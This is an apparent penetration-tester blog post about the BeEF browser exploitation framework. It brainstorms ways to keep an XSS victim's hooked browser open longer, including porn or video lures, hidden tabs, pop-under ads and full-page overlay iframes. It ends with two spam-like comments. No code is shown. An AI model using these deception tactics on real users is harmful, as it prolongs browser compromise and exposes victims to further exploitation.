Recent
Persistent BeEF
No, not that kind of beef!
“BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.”
http://www.bindshell.net/tools/beef/
BeEF is a tool used to enhance the exploitation of Cross Site Scripting (XSS) attacks by providing a complete and easy to use exploitation framework. It currently sports Metasploit integration, keylogging, port scanning, TOR detection and many other cool features. You no longer have an excuse to fill your reports with ‘XSS’ pop-up boxes!
The original release of BeEF was written in PHP while the current development version has been ported to good old Ruby (in case you didn’t know, Ruby is awesome). The Ruby version of BeEF, 0.4.1-alpha, was released last month and when complete will integrate other awesome XSS/browser exploitation tools such as Browser Rider, XSSShell and XSSTunnel.
The problem when exploiting XSS is that your payload only runs while the victim has the page with the payload open. Most users get bored easily and will quickly browse to another page or close it before you have the chance of launching your meterpreter payload. I have spent the last couple of months thinking of different ways to keep the victim on our infected page and over the past few days I have started to ask how other people solved this problem.
Here are some of my and other peoples suggestions in no particular order, thanks to my Twitter buddies and the BeEF mailing list for some of the following.
1.Pr0n (very affective if it is something out of the ordinary and the victim is a young male not in the work place, this was the most popular suggestion on Twitter)
2. A time wasting video or game (I especially like this one but more targeted ones may be more affective http://www.youtube.com/watch?v=txz1VyVMy6g, video thanks to @redmeat_uk)
3. Open a new tab with the BeEF hook included (most people won’t even notice the new tab, thanks to Sussuro for the suggestion)
4. A pop-under add (this is an awesome idea https://secure.wikimedia.org/wikipedia/en/wiki/Pop-up_ad#Pop-under_ads, thanks to Vitaly Osipov from the BeEF mailing list)
5. A 100%x100% iframe to overlay the real page (problem here being the URL bar would be static, thanks to Wade)
6. Google (mail) Gadget (if your like me, I’m constantly logged into the Gmail web interface, problem is Google’s cache prevents the persistence, after weeks of playing I’ve still yet to get this working, here is one of my early attempts http://pastie.org/private/v69ilhjyr8pcv3xtcq7nyq)
So here are a couple of suggestions for you to get your persistent BeEF zombie. I was asked by one of the BeEF devs (Wade) to implement a persistent feature into BeEF itself, I will give it my best shot over the next month or so. In the meantime, what methods can you think of to keep a persistent BeEF zombie?
2 Responses to “Persistent BeEF”
miami home security systems
Very good post. Hope to see more excellent posts in the near future.
Ashish
Information about security tools and hacking tools http://www.securitytube-tools.net :D